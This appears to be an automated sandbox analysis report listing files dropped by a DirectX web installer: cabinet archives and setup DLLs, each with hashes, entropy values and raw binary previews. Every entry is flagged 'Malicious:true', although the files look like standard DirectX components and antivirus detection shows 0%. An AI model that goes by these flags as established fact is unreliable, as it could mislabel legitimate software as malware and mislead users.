                                                                                              Preview:MSCF.....>......D............................>...#..............v.....:........8wq..d3dx9_38.dll.<'....:....8.r..d3dx9_38_x86.cat.....D.:....8.r..d3dx9_38_x86.inf.,...O.:....8.r..d3dx9_38_x86_xp.inf.\...{.:....8.r..Jun2008_d3dx9_38_x86.inf. .,:..[.... .,......$Q.f...<....B..W...WWRT%.*,..6mZ....k.!H}_.aAkk..C..............Z...1.5.!....S.-.Uy....# ...g....3...q.u.N..Nz.2Zq..D..+r."S9..ZT$.QD...UM..4......P....@...f.h...}..l7.{l.e7..#.b.$_...Q_...#......CC@)@......@......1...`....D.$m....wgg...B...n..E..{x,u.{.VK.;:.7.M$IO3v.u..v.p.%...N.X/.:Q..E...(/n..%Y...."..X.)}U.5...9F\.C>.....9..L.1.T.....4I.$R...5.L'.e.H.`.....H.._....9...XQS....r..>H.Gw..I.}.I...S.M.#Q....a[.....C.o...HR6|..#....Ccu.^....=...f.N..LH.nMzk.k.....k..V..S..^.^,BdOQ.E..^.q..y.z.A{x..g8....i.....l.....f...a,..\xzC...r.@...C~....\.....!8..)....ZU ..%.e.xG..<.i.*....yVH.AA......M.F....Ph..,.Uap.....9...-...v.V.... |..*......X...6....P...,.K.O.Qe...).]`..C..............,..+.q.........w...

                                                                                              C:\Windows\SysWOW64\directx\websetup\Mar2008_d3dx10_37_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 812300 bytes, 6 files, at 0x44 "d3dx10_37.dll" "D3DCompiler_37.dll", flags 0x4, ID 8943, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):821468
                                                                                              Entropy (8bit):7.9989494569533655
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:k8Yjgk28yEYvDLX3XmZcLHo9yLvTJqnrT+LprnNjjjGM6pdKi814DYnciABrI55V:1Yjp/yEcfLI9y4rORNYdKibxBrIS6
                                                                                              MD5:8234B9B90BCBB5077E1B5FAA0B66D1A9
                                                                                              SHA1:E9207C572FDEC592B7C17A7F9C6F875C8A55B1F0
                                                                                              SHA-256:6A2727269E6CAC7C4D2E316333D29BAC0DC1CD7F51C36C0C08B0388203DEDAD2
                                                                                              SHA-512:74C94A6E092D7C828FC1E3FAEE4B21917AFC3CACEC04F260754190D0533F93A58289763AC620E5A577F7865902023B30548CDA4D9E968C90EE13050AD6D1E8C5
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....e......D................"...........e...#..............:.............E8...d3dx10_37.dll...........e8....D3DCompiler_37.dll.f(..(.....e8K...d3dx10_37_x86.cat.I.........e8....d3dx10_37_x86.inf.i.........e8....d3dx10_37_x86_xp.inf.c...@.....e8....Mar2008_d3dx10_37_x86.inf...-..,..CK..\TU........[fz.,P..0}Q.a.L...T..`.f.;........i..io{n.*...ej.i.Yb........;w....r.....s...9.<g.%f.4.F.q...F.*"_zr.........6.4}..I.8.;o..9L..j.9.43..Z.....M`rl&..A.....n.b..Q.....;..).).MK{J...!...1..T'....:..&...,*O.k\.!}4.d.vH/5.0.....x-!.....{.c..@......Dm53SG.W..A..5..MK..P.?ZK64'd..%.4p......'..v.a-..3!...iYM...Jc.B.i..^.4.;.....b....:..i..'Ui{2.$m.t(w..w...Km..ZrM:..7g.p.w.m$..k..`..n..7JK.`...%..O..d..`....@2h.j.s.ZR.V....?..p-i.:../...@.X.&..:RK..y`"p.. ...a..\.@Y..l...<0.lB|6.d...Ac..N..=`.(..@.._.....)...`(....\..|....@.~i..-....z}.........]..'.........<0...d...A.h......e..@...6....,.....D0..A....A8...@K.a..6/.\.&t.$/.V.I.....f.".....t.$.....H..X.6....$

                                                                                              C:\Windows\SysWOW64\directx\websetup\Mar2008_d3dx9_37_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1437322 bytes, 5 files, at 0x44 "d3dx9_37.dll" "d3dx9_37_x86.cat", flags 0x4, ID 7166, number 1, extra bytes 20 in head, 116 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1446490
                                                                                              Entropy (8bit):7.99972380205062
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:vFs/gTzoeHhwLMLDjl5XbCzgxt0Q98wWz35UM0vE03yYCmPI7ik:veKTHhbLDbDP0Q5UUtBC2PAz
                                                                                              MD5:8ED75E3205C2B989FF2B5A7D2F0BA2DF
                                                                                              SHA1:88846203588464C0BA19907C126C72F7D683B793
                                                                                              SHA-256:91A50D9EFCDFBCDF22A91D6FBB0F50D3C2AA75F926D05CC166020BF7AAF30E28
                                                                                              SHA-512:D0CF0E3AAD9C8C43A927D1BBBD253B9FE4C97B638AD9A56F671EBEDA68FC9BC17CC980D93095FBB248DD61DC11B7E46C22D72CEE848B150F7A13EAD9E08A7891
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............t.....9.......e8....d3dx9_37.dll.<'....9...e8I...d3dx9_37_x86.cat.....D.9...e8....d3dx9_37_x86.inf.,...O.9...e8....d3dx9_37_x86_xp.inf.\...{.9...e8....Mar2008_d3dx9_37_x86.inf..$.0:..[.... 92......$Q.f...>J...h.].W...uWL.I...W]J.X..V..{..Z........X.G{<..033.4..P..........ek |.b./..gFB'S...K.....fe.5.u..T<{..H....XG84QbDR.8X.Hf.H..46...H"0 ..HH.S............*.(_ ..w...H.....Q..P..vT.t@.G+...1...YH... V..Y4H..P..1R$l/..20!ls'...;....;..kmttyu...x.s....q.....q$.C..5k....(....B.r..y..<.6...Fz..hn..-.....Q.3Z...@.1.V..S?...a|....(6.......D. ....)Ej....GJ%.5 ........G.w>......p...i}..<.|..b.&!..7E.yU.O-.D......O.UC..yIA.Aj.._..D...VOc....{.f]J.<...r.)o.|-...>.PWF.....;.;..vb....4..QV'f.$......:S.hi...~...}3k......\...}a.......L5..*e....|.....1..n...T...t......[....Z.].e....d.A......'..|.V.2.|Ax..W..........B.>...x.. ..|.`...L.h..H.i.....@-.aa...7...K ...../..l.x....r...0>x..@/X...W..L..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Mar2009_d3dx10_41_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1034785 bytes, 6 files, at 0x44 "d3dx10_41.dll" "D3DCompiler_41.dll", flags 0x4, ID 8914, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1043953
                                                                                              Entropy (8bit):7.998757160305283
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JAEjuCeK6JgAkPBJoBgsqDP8FbGACV0L/sW0G+vv2:JFuCeVJqyxqDUFb9CV8r
                                                                                              MD5:45E83CBA5710A1DE7D3990A288122E85
                                                                                              SHA1:23C4BFBDDCFB11ACB7C47C409825F039AF7EB908
                                                                                              SHA-256:B7DA29103CDF374DE0C09713CB985035EAC45FB8B394D3B8157D8A7562A89899
                                                                                              SHA-512:8C56D376D349AA00948E1F3C6168DADE76AC9A26ADE1AAC5A385DCF0253602F5A2973483D083425195DB6AD7717494FD3CF674F5549774AC608CEFA2A88BF0A7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....!.......D................"..........!....#..............G...P.........i:k{..d3dx10_41.dll.h-..P.....i:k{..D3DCompiler_41.dll.......#...p:.r..d3dx10_41_x86.cat.I...a4#...p:.r..d3dx10_41_x86.inf.i....7#...p:.r..d3dx10_41_x86_xp.inf.c....:#...p:.r..Mar2009_d3dx10_41_x86.inf.Nn.>.0..CK.wT.I..{.G.C.QQ.#(I.T`..Q.........0.b..5`Xs..bD.@..f1.9..x....Yw..{...s..U...[.kjj.....h3...TV2.nFx92?~=....m.l.[n.[..(81)]..R&..Sd...J.,F!Se..Re..A..e..~}..b.e[.fd.np.+..[......R;.z.....v....N.~...ibx.h.S.....W...7..-.a.8...`...$u..A.0K....j1..g..A.^k1...Pj.]bm.ym..~t...+d..`*..LG}..X...#.J.....;'e.Z.-.2..m.0....[W..#......j.05.Z.R.!..:.jd..e.........O..7:...\....k..bY...s4W).. ..%.......:g............p..Z...... ..<5.2..].... ..X.,..!~.0...v..k.c.1.2..V.10.L.#.R.x.=.S.9.....27.S@.....d.* .p.l.d......}.\...;.e./.0 ...&.~...8.\...:.L;.'....R..."`;p.....>...........BhW6.I&..D.!.3`...M...>u.....S.A......E@...0.P..@8....v.9....X@..."e....'..`c...(...^..R.'p...4....{ ...f...2....h

                                                                                              C:\Windows\SysWOW64\directx\websetup\Mar2009_d3dx9_41_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1606486 bytes, 5 files, at 0x44 "d3dx9_41.dll" "d3dx9_41_x86.cat", flags 0x4, ID 7142, number 1, extra bytes 20 in head, 128 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1615654
                                                                                              Entropy (8bit):7.999772423092358
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:xFtN95ew18Yl4WTrZnZSibmmq18Whxp9pWISiIz9cXwowwenm2AB4qDA2mV7Q:newRFZ8ib6T3p9pW9/Z4bM/XkA+
                                                                                              MD5:901567428D8C82756D7BF5A406441BD7
                                                                                              SHA1:6E3C22147F3DA77AC8F20D615CA32B5EF2A0ED28
                                                                                              SHA-256:32356344AEDDF709C9D5302D8F3FCC1FF1BE2E82D8D17833A2086400AF248794
                                                                                              SHA-512:6FD4C429E32480BDFF4E58BA8BC0D28FE97C9FF5EF1FABBB856230EFA669246A354F99B723E7483D548B74C121AC8BA9CBA2B5BC3C18F35EE828302D392CF6ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF....V.......D...........................V....#..................X.?.......i:k{..d3dx9_41.dll.....X.?...p:.r..d3dx9_41_x86.cat.......?...p:.r..d3dx9_41_x86.inf.,.....?...p:.r..d3dx9_41_x86_xp.inf.\.....?...p:.r..Mar2009_d3dx9_41_x86.inf.x..#.9..[.... .3......$Q.f...<...!..vW]....]eJ.*Uaq....a.Zk....}_..=hk..C.=...."......?1<..izt.`Y.._ .....H.`...uI35.:.,L.....I.;...........&...B......I....!@.A...A....a......................#..&.E....J..%. ......!..Q0..P.F......$.!...q..yXf..d....7,v......Y.....Q......EI.&..Rm....d.I....D........WJ...`.u..WK..K........yQo...2...W.U\.C.m...a.k.kpq.U..C.5.Hh).......<R.s.l.+.......);........%.g.g.....i..I.U.).H......l./._...<.C....a....U8.'.,.0GR....=.5....E.......jln..MKiliw..Q......,.2{..k...\.X$.......Q4..??...ns...?*....t.|.8U..>WJ./.>S..Vp.....0...3 ....'!*....,R........Ph..#.t*.7=.?p....D.....hX..H....J.`...Z.......$7t.......a...|S....(..G. ...V+`...,.X.P..lZ`...X>Bt....E*aM..(`..0......BA3..p.%..OE.c``.BU....).P5

                                                                                              C:\Windows\SysWOW64\directx\websetup\Nov2007_d3dx10_36_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 797924 bytes, 6 files, at 0x44 +A "d3dx10_36_x86.cat" +A "d3dcompiler_36.dll", flags 0x4, ID 9083, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):807092
                                                                                              Entropy (8bit):7.998858073625772
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:EL+Y8gC2xQcaINcDDHwNXjNOl93uN850V7ZcR0SEDR3l3M:vD2xaINcDHIzhs0Vwz6c
                                                                                              MD5:3D9A0C59156D03DA0F19C2440E695637
                                                                                              SHA1:55B050991CB17410C75ADC3913066BAEDB482ED0
                                                                                              SHA-256:BDF7FB01C02783A4F8C9F5E7911F5CAE3E2A7CBC425B90B36F9EA6EEF2C27DE3
                                                                                              SHA-512:E9A662498C43865E917F0778B772D6964517E41289CBF5A0B8A4E44D8C4B4E9A5049C76F2ECBE4ACC7E9CFCC3F1D87A75C3F8703E66804CE758969814BA14FDA
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....,......D...............{#...........,...#..............8...h(........V7.. .d3dx10_36_x86.cat.....h(....L7.y .d3dcompiler_36.dll.h.... ....B7.O .d3dx10_36.dll.I.........V7P. .d3dx10_36_x86.inf.i...1.....V7P. .d3dx10_36_x86_xp.inf.c.........V7P. .nov2007_d3dx10_36_x86.inf..d.....CK..8.....Y..^(4cK.......H....0..F.]1..$.(W...P.-..J.).[*.%Q....M.v......>Os.c.......=.|.}..d*.r.5....q.s.J..*k8....y89....e...D...Q.!aL./,..l...@~N..J~..)...=..].)......o.@.... ......,R...".@&L.i..........Z.6`..C.......]6.Z.._V..J T.B......l......,..t.6.....md.p..5...l.....B...aI,.F.mU..<T...@Hf.......d{..... ..1.0$.....j.AE..#'..'.%..%....4..p..P.g%..(.H..d..........R#..L..H. mXq..c......6tU$....cii.e............1dA...f.... .........U.B..b.....Fj.z;x...f2. gY.....9.u24. .O&....!E-.....R.d+...5.b..![.dG.....""{U.C...........9p.M....Y|.\f......E....).J...d..0.l.A......0$.....}....e......t..^W..LM(.$,... +.....A..K...f.p..dD...,..E2n..2/k-...d.E2.-.@.S...1.........pA..H..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Nov2007_d3dx9_36_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1703400 bytes, 5 files, at 0x44 +A "d3dx9_36_x86.cat" +A "d3dx9_36.dll", flags 0x4, ID 7211, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1712568
                                                                                              Entropy (8bit):7.999078652914364
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fMb9V3TN8vuaBYlFhEbpdjRsI+CpoUjrn++qWYxhiUX21LVpmI9P2BZbcNU7YBP1:kJEvlmFMpdj/Npocz++q3X2tnLAcm0Bt
                                                                                              MD5:C5E127067EE6CACDD2F8962E6005542E
                                                                                              SHA1:22C571E4DA75A6E5DFE02E3E3587F40C2939C745
                                                                                              SHA-256:F52CC1304B533083B3FC5553C49433C0E4E46D66D567B9DE0B558CA518DB1544
                                                                                              SHA-512:E70DF11AF8CB5D51C3111B8327371EA40292580F06D7D265F2449B89A4941C4740BDE904367FBCB4158512939BBD7C7A3DC20D3642475789FC075A2AE8E27860
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............+................#..............s...>'........V7.. .d3dx9_36_x86.cat...8.>'....L7.y .d3dx9_36.dll.....F#9...V7O. .d3dx9_36_x86.inf.,...Q&9...V7O. .d3dx9_36_x86_xp.inf.\...}(9...V7O. .nov2007_d3dx9_36_x86.inf..*G~.;..CK..TS..._....E..)...!4...iR.....Z."] .."......K..T@.B.....]....|...w......y...w.3w..7..//s..R3...H.N{/..F.Yj..J..@..a^.........,.a.^M....".!.,T>......T. .h..-..]./.8.^..../%..q0....x..',4.....Y.9...2..!+...!]Pp.J.`...=.B.W<(.........d.d.l/.Xq,9}9> ..l.}....@......R.dY.x.8@.(..C!.?...)....f.-a.l.+6..U..vbO.q.%]s.....H...$g.... .=...l8. X2.I@.b....Y.V"...[..f5{.$`K.e3.....PE;.Nx`@.f..$....r...i>[..$]`A.:.....jv~.gg...Y....M.....x7...H..'.J.y..oV......j.aU...fc....U..i.....B.q..N>...`........`H9XVN.r..![.+..!H...B..i.-....r...f`l....V.?{.z..H.Ym../.o...Q...p....<d..,....9.7O..c....d.<.`.L..!..{...b .>.QH..)..B.........,...Hx..$a8N.^.rE.+Z..c#h...Xu..,.D"b.h..z$=....G./...l....z./.F..)..v....v':..5....G...... ...p

                                                                                              C:\Windows\SysWOW64\directx\websetup\Nov2008_d3dx10_40_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 959461 bytes, 6 files, at 0x44 "d3dx10_40.dll" "D3DCompiler_40.dll", flags 0x4, ID 8926, number 1, extra bytes 20 in head, 77 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):968629
                                                                                              Entropy (8bit):7.999011847061652
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JKTxCzc8gSDnU8Hz10a0s65QckarHGlImJtXn+QbtU0sHsqzn:mxCzs29r0WQma69nBbtU0sjzn
                                                                                              MD5:5DFEB46E60795266DA03F2D0A67E7ACD
                                                                                              SHA1:A77758873E5544E8AD22ACF469C4A0FD0C944A88
                                                                                              SHA-256:EC52B075A3E9C7FE468B317E0FF977964B1003D560065128741F4392BF47C49A
                                                                                              SHA-512:6EC058811AC017BE3CD3A46559CD73126666F41B0FA58D92C1168CF2A2E0E2357B19F65531C786EC81A438975DBECE440C5E7B6C653AFA5428CE6C444179AF6C
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D................"..............#..............M...X.........O9.2..d3dx10_40.dll.`...X.....O9.2..D3DCompiler_40.dll.......%...O9p:..d3dx10_40_x86.cat.I...g.&...O9h8..d3dx10_40_x86.inf.i.....&...O9h8..d3dx10_40_x86_xp.inf.c.... &...O9h8..Nov2008_d3dx10_40_x86.inf....X.0..CK..T...{..J........D...$.....$.2.....&L+...u..Q.5#f...W].9cN...w..Qd...y.......9~.}..]u+tOMM...r.].a.O..f7#.\........m.l._a.[..,4Q.&KU...c.eq1))*.,V!S...)2...Y.*^a.Q..b........y_x.W..Q^J^.j..P..gB.*..<w....E_).$j..q.|y..{.'....1V-..N.bt..%...A.0K....u...O...K.u.F.H(u>.X.vbd.......)..Ltg)c.a..J..|.V).N.F`G.Lxk..Rf.-.<1b...0..y...*y!.g..F1Z.v..T..o......i.............!Jku.:..i...e.....Z.HR.0...6.....zk1..._.-.L....a).Gx.).........@6...........P.\....?`.....f...|.r......L9......S.T ........o:J.'.E`?..x..?...$........z.......,.<.'..D.j .....G...3...G;.......p...&@W...;....^........R .X.....L ............-...........'.r`7........)........=......r..j,e..j.)..........uX)..p.B...

                                                                                              C:\Windows\SysWOW64\directx\websetup\Nov2008_d3dx9_40_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1544836 bytes, 5 files, at 0x44 "d3dx9_40.dll" "d3dx9_40_x86.cat", flags 0x4, ID 7155, number 1, extra bytes 20 in head, 134 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1554004
                                                                                              Entropy (8bit):7.999645278979612
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:K3tdQkdeoPJLiej+pb7Q15LwQrpLeWvYMWbPBmcnILz+0Byna:2dvdeAweSBQPLwgpCWvYMQ5mcnIH+m
                                                                                              MD5:75556D89FDD442967A23993C9111D997
                                                                                              SHA1:003DE53653C0CC84F8C3D617D1F76FB475F1A7CB
                                                                                              SHA-256:863AC3438F57158D4F53900C6924BFDC132AB43A5AF57D4658E65842836B4FA1
                                                                                              SHA-512:6086114500DBBF4DB9D0A9C3F72732995BB9A3AB5C135EAD53143749B95651B37B64BE7A52CA09388DE90216FD00486FDFCFBC87D42D77FAC469F82B5290E06D
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................P.B.......O9.2..d3dx9_40.dll.....P.B...O9n:..d3dx9_40_x86.cat.......B...O9h8..d3dx9_40_x86.inf.,.....B...O9h8..d3dx9_40_x86_xp.inf.\.....B...O9h8..Nov2008_d3dx9_40_x86.inf..=.:.:..[.... .2......$Q.f...<....!Z.J.+...*ea..U.q....ha.x.y...........=.h!............X.{.<,.....?..b.):.[J{....^=mv:.i.e..}9s............F.QN.^+.).p...!9.4L..B.k ....F.}..R.. ..D%P4@...'2.$C..EU..:_... ..=.....2...Q...H|..2.hi....H3.*.%JA.O...s.n-..<.<..9;7p.wnxw,||.....du.......)..$3CN.'.)j..|...x.w..>..4.D..."..I.'.=.....$.7..m...J..F....0..F.XD..v....."*|2...A.H.R..b.()! .|..Hh`....Q.K...NH..9../^...|[!.)k...8._C/~D.W..K4.}.B.T.b.Kw..si..6.E.#6w......_.,.>6{r$X&:....s.w......k....h'5......3...0XOG.^.=..j....sFg.jO. t..?.S.l5?.t...s....`...]......'$LJ.........Z]h.. ..h.l.5b....F..0......m.....P.....n....Z.... <..7.@...,`@..#.i.r....... ......@....|....e/.pa...@Q.A..'.EL..7H..?^..C.........]i p..N7....:i.P.........

                                                                                              C:\Windows\SysWOW64\directx\websetup\Oct2006_d3dx9_31_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1121257 bytes, 5 files, at 0x44 +A "d3dx9_31_x86.cat" +A "d3dx9_31.dll", flags 0x4, ID 6911, number 1, extra bytes 20 in head, 75 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1130449
                                                                                              Entropy (8bit):7.9990817245216945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fd5gyP75nbAgKdWsTLSCs3BZnH50ve35Jxroo6DS:F5fP75nbt0STRZn9nxrb5
                                                                                              MD5:F778928C9EB950EF493857F76A5811AD
                                                                                              SHA1:EA82D97077534751297AE0848FB1672E8F21E51E
                                                                                              SHA-256:4891E2DEA9D1798F6A89308E58C61A38E612F8433301EA2376AE14C3DFCB3021
                                                                                              SHA-512:1F382A287FC6763B8E8D66825E8256DFB7D0DEAD6B6A6B51DD7C4A5C86D536CC7EF4128BE0CE495FE17C859018750072DC7B43E3476D1BA435F209CC4EB6D43F
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............K.............<5m. .d3dx9_31_x86.cat...$.......<5.. .d3dx9_31.dll.......$...<5.. .d3dx9_31_w9x.inf.......$...<5.. .d3dx9_31_x86.inf.......$...<5.. .oct2006_d3dx9_31_x86.inf.j5o.s>..CK..\....oh"....Fl..'.......i.*vC..... `..w...6.....`.....;..E..........l.w.3....Y,..+......yg.a.....$.`0...6...XZ4.FX..J...l.V..o;F^..lH....3'.f0..G.m..P.[>...G..j..c^....p.<OAO.N.q.Z.E...hk..H...'@../.B.....q`K...y"..-9.r.'.9...x.O.R.8.......c....`Gc..C....>......X.......|0c..tz......./....-.faa.0..<,.V.^X..B......:/...y...3...X.GZ..T......Bi[.KY.x..A...3.[...s..l..J..U..h.../2Z"7......k....yB.E^.r....T........K.....,...X..)..C...z4.....b......o..yv5.!5...CD`&.\.<0..P.y9..e..`{m8..K.:(.....w..la..@.++.N... .y6.m.......,.c...[lc....d..AM.6........ .P...uD.........m...........m.e.`9t..+..aa..@5.y}r.\..rJ.={9f...3...fO4.u.V6u-z.....t.n..*.A..0%.T....L'.[K...Uh....Ul....vum.........N.U..).)Q...x.RaPk5..X3z.e...

                                                                                              C:\Windows\SysWOW64\directx\websetup\SET8E7C.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):89944
                                                                                              Entropy (8bit):6.418506334480987
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:gtBqvGpPmOEll4RWxiF9G3ZnVdqkFKJuTJbHo0Xm+jN3i97ZTj4FWMD+ZJqsHPCL:gtAvG5mOEll4Roi2pVVFKJuTVtXVpS9y
                                                                                              MD5:0A23038EA472FFC938366EF4099D6635
                                                                                              SHA1:6499D741776DC4A446C22EA11085842155B34176
                                                                                              SHA-256:8F2C455C9271290DCDE2F68589CF825F9134BEECB7E8B7E2ECBCABEAB792280A
                                                                                              SHA-512:DCC1C2EA86FD3A7870CD0369FA42F63D493895C546DCDD492EE19079A0D0696D689BBFE7B686D4FA549841896A54E673FC4581B80783D7AA255DFAD765B9DC88
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NOd..............V..........u...eX......eX......eX......eX..`...eX......eX......Rich............PE..L....A.L...........!.........N.......p.......0......................................2.....@..........................$..y............p..h............H..X.......`... ................................=..@............................................text............................... ..`.data...<0...0......................@....rsrc...h....p.......,..............@..@.reloc...............4..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\SysWOW64\directx\websetup\SET8EBB.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1801048
                                                                                              Entropy (8bit):6.400511251324513
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:RjnIXtNeOOOOOOOOOOOOOOOOOiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWI:5IjmY
                                                                                              MD5:7672509436485121135C2A0E30B9E9FF
                                                                                              SHA1:F557022A9F42FE1303078093E389F21FB693C959
                                                                                              SHA-256:D7EA3CF1B9B639010005E503877026597A743D1068AE6A453CE77CC202796FEA
                                                                                              SHA-512:E46FF68C4A532017F8AB15B1E46565508F6285B72C7A1CBE964ED5E75320C8E14587D01FEE61B3966F43636BFE74CEBD21F7665B4A726281E771CF9230E69863
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.,.{.BZ{.BZ{.BZr..Zh.BZ{.CZ.BZ...Zi.BZ...Zz.BZ...Z..BZ...ZQ.BZ...Zz.BZ...Zz.BZRich{.BZ........................PE..L....A.L...........!.....`...................p............................................@..........................m......d^......................d..X....p... ......................................@............................................text....^.......`.................. ..`.data....4...p.......d..............@....rsrc...............v..............@..@.reloc...-...p.......6..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy)

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):89944
                                                                                              Entropy (8bit):6.418506334480987
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:gtBqvGpPmOEll4RWxiF9G3ZnVdqkFKJuTJbHo0Xm+jN3i97ZTj4FWMD+ZJqsHPCL:gtAvG5mOEll4Roi2pVVFKJuTVtXVpS9y
                                                                                              MD5:0A23038EA472FFC938366EF4099D6635
                                                                                              SHA1:6499D741776DC4A446C22EA11085842155B34176
                                                                                              SHA-256:8F2C455C9271290DCDE2F68589CF825F9134BEECB7E8B7E2ECBCABEAB792280A
                                                                                              SHA-512:DCC1C2EA86FD3A7870CD0369FA42F63D493895C546DCDD492EE19079A0D0696D689BBFE7B686D4FA549841896A54E673FC4581B80783D7AA255DFAD765B9DC88
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NOd..............V..........u...eX......eX......eX......eX..`...eX......eX......Rich............PE..L....A.L...........!.........N.......p.......0......................................2.....@..........................$..y............p..h............H..X.......`... ................................=..@............................................text............................... ..`.data...<0...0......................@....rsrc...h....p.......,..............@..@.reloc...............4..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy)

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1801048
                                                                                              Entropy (8bit):6.400511251324513
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:RjnIXtNeOOOOOOOOOOOOOOOOOiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWI:5IjmY
                                                                                              MD5:7672509436485121135C2A0E30B9E9FF
                                                                                              SHA1:F557022A9F42FE1303078093E389F21FB693C959
                                                                                              SHA-256:D7EA3CF1B9B639010005E503877026597A743D1068AE6A453CE77CC202796FEA
                                                                                              SHA-512:E46FF68C4A532017F8AB15B1E46565508F6285B72C7A1CBE964ED5E75320C8E14587D01FEE61B3966F43636BFE74CEBD21F7665B4A726281E771CF9230E69863
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.,.{.BZ{.BZ{.BZr..Zh.BZ{.CZ.BZ...Zi.BZ...Zz.BZ...Z..BZ...ZQ.BZ...Zz.BZ...Zz.BZRich{.BZ........................PE..L....A.L...........!.....`...................p............................................@..........................m......d^......................d..X....p... ......................................@............................................text....^.......`.................. ..`.data....4...p.......d..............@....rsrc...............v..............@..@.reloc...-...p.......6..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\SysWOW64\directx\websetup\dxupdate.cab

                                                                                              Download File
